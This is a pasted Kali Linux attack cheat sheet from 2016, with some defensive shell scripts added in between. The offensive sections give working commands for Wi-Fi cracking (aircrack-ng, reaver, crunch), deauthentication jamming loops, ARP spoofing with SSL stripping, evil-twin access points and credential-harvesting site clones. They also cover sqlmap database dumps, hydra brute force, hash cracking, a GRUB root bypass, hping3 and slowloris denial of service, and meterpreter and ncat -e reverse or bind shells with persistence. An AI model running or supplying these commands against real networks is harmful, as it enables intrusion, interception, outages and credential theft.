Kali Commands

a guest
Aug 14th, 2016
Sites:
nmap.org
exploit-db.com

TOR
apt-get install tor -y
adduser anon
nano /etc/proxychains.conf
USE SOCKS5
uncomment dynamic_chain
get root (su)
add "socks5 127.0.0.1 9050" to end of the file
service tor status
service tor start
proxychains firefox www.duckduckgo.com
check dns leak
proxychains nmap

VPN
cat /etc/resolv.conf
nano /etc/dhcp/dhclient.conf
change "#prepend domain-name-servers 127.0.0.1;" to the OpenDNS addresses, separated by a comma
service network-manager restart
cat /etc/resolv.conf
disable WebRTC
about:config in iceweasel
change media.peerconnection.enabled to false and restart
www.vpnbook.com (download software and get username and password)
unzip VPNBook*.zip
openvpn vpnbook*.ovpn
www.dnsleaktest.com
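
An added check for the resolver step above (this script is not part of the original paste). It compares the nameserver lines of a resolv.conf with the resolvers you meant to configure; the two addresses it expects are the public OpenDNS resolvers, and the expected set is an assumption you should adjust to your own setup. The sample resolv.conf text and the function names are constructed for this example.

```sh
#!/bin/sh
# Added example (not from the original paste): verify the active resolvers after the
# VPN/dhclient change. 208.67.222.222 and 208.67.220.220 are the public OpenDNS
# resolvers; the list below is an assumption for this example, adjust it to your setup.
EXPECTED_DNS="208.67.222.222 208.67.220.220"

# Print every nameserver in resolv.conf-style text (stdin) that is not in EXPECTED_DNS.
# Empty output means no resolver outside the expected set is configured.
unexpected_resolvers() {
    awk -v want="$EXPECTED_DNS" '
        BEGIN { n = split(want, w, " "); for (i = 1; i <= n; i++) ok[w[i]] = 1 }
        $1 == "nameserver" && !($2 in ok) { print $2 }'
}

# Exit status 0 when every configured resolver is in the expected set, 1 otherwise.
resolvers_ok() {
    [ -z "$(unexpected_resolvers)" ]
}

# Constructed resolv.conf content: the router (192.168.1.1) is still listed, which is
# exactly the kind of leak dnsleaktest.com would show.
RESOLV_SAMPLE='# Generated by NetworkManager
nameserver 208.67.222.222
nameserver 192.168.1.1'

# Run against the real file with: resolvers_ok < /etc/resolv.conf
printf '%s\n' "$RESOLV_SAMPLE" | unexpected_resolvers
```

Run resolvers_ok < /etc/resolv.conf after the network-manager restart and again after openvpn is up; a non-empty list from unexpected_resolvers means dhclient or NetworkManager put a resolver back that you did not choose.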

Macchanger
macchanger -s eth0
macchanger -r eth0
macchanger -p eth0

MAC_Change.sh (chmod +x)
[
#!/bin/bash
# take eth0 down, give it a random MAC, bring it back up
ifconfig eth0 down
sleep 2
macchanger -r eth0
sleep 2
ifconfig eth0 up
]
crontab -e (@reboot /path/MAC_Change.sh)

Nmap (Zenmap)
Test: http://scanme.nmap.org/
nslookup [site or IP address]
curl ipinfo.io/[IP address]
nmap scanme.nmap.org -vv
nmap -oG - 192.168.1.0-255 -p 22 -vv > /home/SCAN
cat SCAN | grep Up | awk -F " " '{print $2}' > SCAN2
nmap -iL SCAN2 -vv
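
An added example for the SCAN/SCAN2 step above (not from the original paste): parsing nmap's greppable -oG output by field rather than with a bare grep for "Up", which matches any line containing that string. The sample -oG text (including its version string) and the function names are constructed for this example.

```sh
#!/bin/sh
# Added example (not from the original paste): pull host lists out of nmap's greppable
# (-oG) output by field. Input is the -oG text on stdin.

# IPs of hosts nmap reported as up, one per line, deduplicated.
up_hosts() {
    awk '$1 == "Host:" && /Status: Up/ { print $2 }' | sort -u
}

# IPs that have a given TCP port open, e.g. open_port_hosts 22 < SCAN.
# -oG lists ports as port/state/proto/... inside the "Ports:" field.
open_port_hosts() {
    awk -v port="$1" '$1 == "Host:" && /Ports:/ && $0 ~ ("[ \t,]" port "/open/tcp") { print $2 }' | sort -u
}

# Constructed sample of what `nmap -oG - 192.168.1.0-255 -p 22 -vv` prints.
NMAP_SAMPLE='# Nmap 7.12 scan initiated as: nmap -oG - 192.168.1.0-255 -p 22 -vv
Host: 192.168.1.1 ()  Status: Up
Host: 192.168.1.1 ()  Ports: 22/open/tcp//ssh///
Host: 192.168.1.5 ()  Status: Up
Host: 192.168.1.5 ()  Ports: 22/closed/tcp//ssh///
Host: 192.168.1.9 ()  Status: Down
# Nmap done: 256 IP addresses (2 hosts up) scanned'

# Equivalent of the SCAN -> SCAN2 step above, without the cat:
#   up_hosts < /home/SCAN > SCAN2
printf '%s\n' "$NMAP_SAMPLE" | up_hosts
printf '%s\n' "$NMAP_SAMPLE" | open_port_hosts 22
```

Feeding open_port_hosts 22 < /home/SCAN into nmap -iL gives the follow-up scan only the hosts that actually answered on 22, which is usually what the second scan is for.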

Reaver
Download from Google Code and extract the gzip
tar -zxvf file.tar.gz -C /path/to/directory
{
-z : Work on gzip compression automatically when reading archives.
-x : Extract archives.
-v : Produce verbose output, i.e. display progress and the extracted file list on screen.
-f : Read the archive from the specified file. In this example, read the backups.tar.gz archive.
-t : List the files in the archive.
}
./configure
make
make install
Get Crunch Wordlist Generator from Sourceforge and ungzip
make
make install
Install USB wireless adapter with VirtualBox extension pack
iwlist wlan0 scan | grep ESSID
monitor.sh (chmod +x)
[
#!/bin/bash
# put wlan0 into monitor mode with a random MAC
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
macchanger wlan0 -r
]
airmon-ng check wlan0
kill NetworkManager then dhclient then others
airodump-ng wlan0
airodump-ng -c [channel #] -w SCAN_DUMP --bssid [MAC address] wlan0
For WEP
{
At same time: aireplay-ng -1 0 -a [MAC address] wlan0
aireplay-ng -3 -b [MAC address] wlan0
aircrack-ng SCAN_DUMP
}
At same time: aireplay-ng -0 0 -a [MAC address] wlan0
Ctrl-C
crunch [min-length] [max-length] -t [pattern] -f charset.lst | aircrack-ng -w - SCAN_DUMP -e [BSSID]
wash -i wlan0
reaver -b [MAC address] -i wlan0 -c [channel #] -r [# tries]:[per secs] -vv

Wireless DNS Jamming
./monitor.sh
airmon-ng check wlan0 (kill processes)
airodump-ng wlan0
iwconfig wlan0 channel [#]
aireplay-ng -0 0 -a [MAC address] wlan0
jam.sh (chmod +x)
[
#!/bin/bash
while true
do
aireplay-ng -0 5 -a [MAC address] wlan0 (optional "-c [MAC address]" for client)
iwconfig wlan0 channel [#]
ifconfig wlan0 down
macchanger -r wlan0 | grep "New MAC"
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0 | grep Mode
sleep 3
echo Waiting!
done
]
Monitor with: airodump-ng -c [channel #] --bssid [MAC address] wlan0

SSL Strip
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port -j REDIRECT --to-port 8080
iptables -t nat -L PREROUTING
FIND TARGET (nmap 192.168.1.2-254 -vv)
arpspoof -i wlan0 -t [gateway ip] -r [target ip]
At same time: iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
At same time: sslstrip -l 8080
At same time: tail -f sslstrip.log
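
The defender's side of the arpspoof step, as an added example (not from the original paste): a host whose ARP cache has been poisoned sees the gateway's MAC change and one MAC answering for several IPs, both of which a script can check against a baseline. The gateway address, the ip neigh sample lines and the function names are assumptions constructed for this example.

```sh
#!/bin/sh
# Added example (not from the original paste): detect the ARP cache changes that an
# arpspoof run causes on a victim, by comparing `ip neigh` output against a baseline
# recorded when the network was known-good. GATEWAY_IP is an assumption.
GATEWAY_IP="192.168.1.1"

# MAC recorded for one IP in ip-neigh-style text on stdin (empty if absent).
mac_for_ip() {
    awk -v ip="$1" '$1 == ip { for (i = 1; i <= NF; i++) if ($i == "lladdr") { print $(i + 1); exit } }'
}

# Exit 0 if the gateway's MAC in the current table differs from the baseline.
# Arguments: baseline text, current text.
gateway_mac_changed() {
    base=$(printf '%s\n' "$1" | mac_for_ip "$GATEWAY_IP")
    now=$(printf '%s\n' "$2" | mac_for_ip "$GATEWAY_IP")
    [ -n "$base" ] && [ "$base" != "$now" ]
}

# MACs that the table maps to more than one IP: a machine answering ARP for the
# gateway as well as for itself shows up as one MAC on two addresses.
duplicate_macs() {
    awk '{ for (i = 1; i <= NF; i++) if ($i == "lladdr") seen[$(i + 1)]++ }
         END { for (m in seen) if (seen[m] > 1) print m }'
}

# Constructed samples in `ip neigh` format. Record a real baseline with:
#   ip neigh > /var/tmp/arp_baseline
ARP_BASELINE='192.168.1.1 dev wlan0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.20 dev wlan0 lladdr aa:bb:cc:dd:ee:20 STALE'
ARP_NOW='192.168.1.1 dev wlan0 lladdr aa:bb:cc:dd:ee:42 REACHABLE
192.168.1.20 dev wlan0 lladdr aa:bb:cc:dd:ee:20 STALE
192.168.1.30 dev wlan0 lladdr aa:bb:cc:dd:ee:42 REACHABLE'

if gateway_mac_changed "$ARP_BASELINE" "$ARP_NOW"; then
    echo "ALERT: gateway $GATEWAY_IP MAC changed; MACs claiming several IPs:"
    printf '%s\n' "$ARP_NOW" | duplicate_macs
fi
```

For live use, keep the baseline text in a file and call gateway_mac_changed "$(cat /var/tmp/arp_baseline)" "$(ip neigh)" from cron; a static ARP entry for the gateway (ip neigh replace ... nud permanent) is the matching mitigation on hosts that cannot be moved off a shared wireless segment.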

SQUID
apt-get install imagemagick ghostscript jp2a apache2 squid3
Download SQUID scripts
nano /etc/squid3/squid.conf
Uncomment: acl localnet src 192.168.0.0/16 (or local network)
Uncomment: http_access allow localnet
Modify to: http_port 3128 transparent
Add to bottom: url_rewrite_program [path]/[script.pl]
service squid3 restart
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 3128
mkdir /var/www/tmp
chmod 777 /var/www/tmp
service httpd restart
service apache2 restart
arpspoof -i wlan0 -t [gateway ip] -r [target ip]

Evil Twin
Enter monitor mode and kill processes
apt-get install bridge-utils wireshark
airodump-ng wlan0
airbase-ng -a [clone MAC address] --essid "Something" -c 6 wlan0
aireplay-ng -0 0 -a [clone MAC address] wlan0
brctl addbr evil
brctl addif evil wlan0
brctl addif evil at0
ifconfig at0 0.0.0.0 up
ifconfig evil up
dhclient3 evil
Listen to evil with wireshark
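
An added example (not part of the original paste) for the airbase-ng clone above, from the side of whoever owns the real access point: compare iwlist scan results with a list of your own BSSIDs and flag any other BSSID advertising your ESSID. The KNOWN_APS list, the scan text and the function names are constructed assumptions.

```sh
#!/bin/sh
# Added example (not from the original paste): detect an evil twin by listing every
# BSSID that advertises one of *your* ESSIDs and is not in your known-AP list.
# Input is `iwlist wlan0 scan` output (as used earlier in these notes).
# KNOWN_APS is an assumption: one "bssid<TAB>essid" per line, lowercase MACs.
KNOWN_APS=$(printf 'aa:bb:cc:dd:ee:01\tHomeNet\n')

# Reduce iwlist scan output (stdin) to "bssid<TAB>essid" lines, one per cell.
scan_pairs() {
    awk '
        /Cell [0-9]+ - Address:/ { bssid = tolower($NF) }
        /^[ \t]*ESSID:"/ { sub(/^[ \t]*ESSID:"/, ""); sub(/"$/, ""); print bssid "\t" $0 }'
}

# BSSIDs broadcasting one of our ESSIDs without being a known AP for it.
rogue_aps() {
    scan_pairs | awk -F '\t' -v known="$KNOWN_APS" '
        BEGIN {
            n = split(known, lines, "\n")
            for (i = 1; i <= n; i++) {
                split(lines[i], f, "\t")
                ok[f[1] "\t" f[2]] = 1
                ours[f[2]] = 1
            }
        }
        ($2 in ours) && !(($1 "\t" $2) in ok) { print $1 "\t" $2 }'
}

# Constructed scan: a second "HomeNet" on an unknown BSSID, plus a neighbour's network.
IWLIST_SAMPLE='wlan0     Scan completed :
          Cell 01 - Address: AA:BB:CC:DD:EE:01
                    Channel:6
                    ESSID:"HomeNet"
          Cell 02 - Address: 02:11:22:33:44:55
                    Channel:6
                    ESSID:"HomeNet"
          Cell 03 - Address: AA:BB:CC:DD:EE:99
                    Channel:11
                    ESSID:"Neighbour"'

# Live use: iwlist wlan0 scan | rogue_aps
printf '%s\n' "$IWLIST_SAMPLE" | rogue_aps
```

Run it from a periodic scan on a box near the real AP; a hit on a BSSID you do not own, on the same ESSID, is the signature of the airbase-ng step above, and the bridge/wireshark part of the attack only works on clients that then associate with it.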

Router Vulnerability
Example:
nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/tmp/ath0.ap_bss -d -n -Pn IPList

DNS Post Authentication Exploit
dnschef --fakeip=192.168.1.102 --fakedomains=randomName.com --interface=192.168.1.102
setoolkit (1->2->3->2) site cloner
nslookup [site you want to clone]
cd /var/www
tail -f harvester_file.txt

SQL Injection
Download DVWA (www.dvwa.co.uk)
Copy the DVWA folder to a clean /var/www/
chmod -Rv 777 /var/www/DVWA*
apt-cache search mysql | grep -i database | less
apt-get install mysql-client mysql-server
service mysql start
service mysql restart
mysql -h localhost -u root
SET PASSWORD FOR root@localhost=PASSWORD('test');
mysql -h localhost -u root -p
nano /var/www/DVWA*/config.inc.php (change password setting)
service mysql status
service apache2 restart
Go to localhost in browser (user: admin password: password)
burpsuite (turn on intercept)
Set manual proxy in browser to HTTP: 127.0.0.1 Port: 8080
Get PHPSESSID
sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" --dbs
sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -D dvwa --tables
sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -T users --columns
sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -T users -C first_name,last_name,user,password --dump
Crack the dumped password hashes (see Cracking Hashes)

Cracking Hashes
findmyhash MD5 -h [hash code]
Change "ro" to "rw" and add "init=/bin/bash" to the end of the GRUB boot line
unshadow /etc/passwd /etc/shadow > pass
john pass
For Windows:
Get pwdump7 from openwall.com
pwdump7.exe > pass
john pass
john --show pass
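
An added example (not from the original paste) for the unshadow/john step: the same shadow file, audited for the entries john would finish fastest on, which is the check to run on your own hosts before anyone else runs john against them. The shadow lines are constructed with placeholder hash bodies; the function name is an assumption.

```sh
#!/bin/sh
# Added example (not from the original paste): flag shadow entries that are easiest
# to crack or need no cracking at all. Input is shadow-format text on stdin, so run
# it as root on the real file; the sample below is constructed.

# Print "user<TAB>reason" for weak entries. Hash-prefix rules:
#   ""      -> no password set
#   $1$     -> md5crypt
#   13 chars with no $ prefix -> traditional DES crypt
# Locked accounts (!, *) are skipped; $5$/$6$/$y$/$2b$ are left alone here.
weak_shadow_entries() {
    awk -F: '
        $2 == ""                          { print $1 "\tempty-password"; next }
        $2 ~ /^[!*]/                      { next }
        $2 ~ /^\$1\$/                     { print $1 "\tmd5crypt"; next }
        $2 !~ /^\$/ && length($2) == 13   { print $1 "\tdescrypt" }'
}

# Constructed shadow lines (hash bodies are placeholders, not real hashes).
SHADOW_SAMPLE='root:$6$saltsalt$placeholderhashplaceholderhash:17000:0:99999:7:::
legacy:$1$abcdefgh$placeholderhash:17000:0:99999:7:::
svc:!:17000:0:99999:7:::
guest::17000:0:99999:7:::
old:AbCdEfGhIjKlM:17000:0:99999:7:::'

# Real use: weak_shadow_entries < /etc/shadow
printf '%s\n' "$SHADOW_SAMPLE" | weak_shadow_entries
```

Entries this reports are the ones a `john pass` run recovers first; re-hashing them (passwd forces the current default algorithm) and locking unused accounts removes most of what unshadow hands to john. The GRUB "init=/bin/bash" line above is why a GRUB password or disk encryption, not just file permissions, protects /etc/shadow on a machine someone can reboot.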
Hydra:
Get name fields from HTML login form
hydra -l user -P passlist.txt [server IP] http-post-form "[rest of URL path]:[username field]=^USER^&[password field]=^PASS^&Login=Login:[fail message]" -V
Can also use hydra-gtk GUI
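
An added example covering the sqlmap steps above and the hydra http-post-form step (not part of the original paste): what those two activities look like in a web server's access log and how to pick them out. The log lines, paths, threshold and function names are constructed for the example; the one external fact used is that sqlmap's default User-Agent starts with "sqlmap/".

```sh
#!/bin/sh
# Added example (not from the original paste): the server-side view of a sqlmap run
# and a hydra http-post-form run, worked over constructed Apache combined-format
# log lines. Paths and thresholds are assumptions.

# IPs with at least $2 POSTs to path $1 (login brute force); prints "ip count".
post_bursts() {
    awk -v path="$1" -v thr="$2" '
        $6 == "\"POST" && $7 == path { n[$1]++ }
        END { for (ip in n) if (n[ip] >= thr) print ip, n[ip] }'
}

# IPs whose User-Agent names a known scanner. sqlmap sends "sqlmap/<version>" unless
# told otherwise, which is the easy case; a changed agent needs the burst check instead.
scanner_ips() {
    awk -F'"' 'tolower($6) ~ /sqlmap|nikto/ { split($1, a, " "); print a[1] }' | sort -u
}

# Build the constructed log: six login POSTs from one client in six seconds, one
# from another, and a DVWA SQLi request carrying sqlmap's default agent.
logline() {
    printf '%s - - [14/Aug/2016:10:00:%02d +0000] "%s %s HTTP/1.1" %s 512 "-" "%s"\n' \
        "$1" "$2" "$3" "$4" "$5" "$6"
}
WEB_LOG=$(
    for s in 1 2 3 4 5 6; do logline 10.0.0.5 "$s" POST /login.php 200 "Mozilla/5.0"; done
    logline 10.0.0.7 7 POST /login.php 200 "Mozilla/5.0"
    logline 10.0.0.9 8 GET "/vulnerabilities/sqli/?id=1" 200 "sqlmap/1.0-dev (http://sqlmap.org)"
)

# Live use: post_bursts /login.php 5 < /var/log/apache2/access.log
printf '%s\n' "$WEB_LOG" | post_bursts /login.php 5
printf '%s\n' "$WEB_LOG" | scanner_ips
```

The burst count is the more robust of the two signals: hydra's -V output above is one log line per guess, so an account lockout or rate limit keyed on this count stops the run regardless of what the client calls itself.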

DoS Demonstration
hping3 -i u100 -S -p 80 [IP address]
nmap --script http-slowloris --max-parallelism 400 [IP address] -vv
./slowloris.pl -dns [IP address] -port 80 -num 500

Reverse Shells
service postgresql start
service metasploit start
msfupdate
msfconsole
In console: msfpayload windows/meterpreter/reverse_tcp LHOST=[IP address] X > /root/Desktop/CMD.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP address]
set LPORT [Port #]
exploit
help
shell
background
sessions -l
sessions -i [#]
use post/windows/escalate
use exploit/windows/local/ask
show options
set session [#]
exploit
getsystem
run persistence -X
ncat -v -l -p [port] -e /bin/bash &
Also: ncat -v -l -n -p [port] -e cmd.exe
Other machine: ncat [IP address] [port]
nmap localhost
lsof -i :[port]
kill processes using port
ncat --ssl -l -p [port]
Other machine: ncat --ssl [IP address] [port]
Download php-reverse-shell
Rename, change IP and upload
Rename and forward in burpsuite
ncat -v -l -p [port]
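
An added example (not from the original paste) that turns the "nmap localhost / lsof -i :[port]" check above into a repeatable audit over ss -tlnp output: every listening TCP port not on an allowlist is reported with the process that owns it, which is how a leftover "ncat -l -e" listener shows up. The allowlist, the ss sample and the function name are assumptions.

```sh
#!/bin/sh
# Added example (not from the original paste): audit listening TCP sockets against
# an allowlist. Input is `ss -tlnp` output on stdin; ALLOWED_PORTS is an assumption
# for this host.
ALLOWED_PORTS="22 80 443"

# Print "port<TAB>process" for every TCP listener whose port is not allowlisted.
unexpected_listeners() {
    awk -v allowed="$ALLOWED_PORTS" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 == "LISTEN" {
            port = $4; sub(/.*:/, "", port)            # strip the address, keep the port
            proc = "?"
            if (match($0, /users:\(\("[^"]+"/)) {      # process name from the Process column
                proc = substr($0, RSTART + 9, RLENGTH - 10)
            }
            if (!(port in ok)) print port "\t" proc
        }'
}

# Constructed `ss -tlnp` output: sshd and apache are expected; a shell bound to
# 4444 by ncat (as in the ncat -l -e lines above) is not.
SS_SAMPLE='State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=900,fd=3))
LISTEN  0       511     *:80                *:*                users:(("apache2",pid=1200,fd=4))
LISTEN  0       10      0.0.0.0:4444        0.0.0.0:*          users:(("ncat",pid=4321,fd=4))'

# Live use: ss -tlnp | unexpected_listeners   (then lsof -i :<port> for detail)
printf '%s\n' "$SS_SAMPLE" | unexpected_listeners
```

Pair it with the lsof -i :[port] step above to get the full command line and owner before killing anything; ss needs root to show the process column for sockets owned by other users, so run the audit as root.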

etc...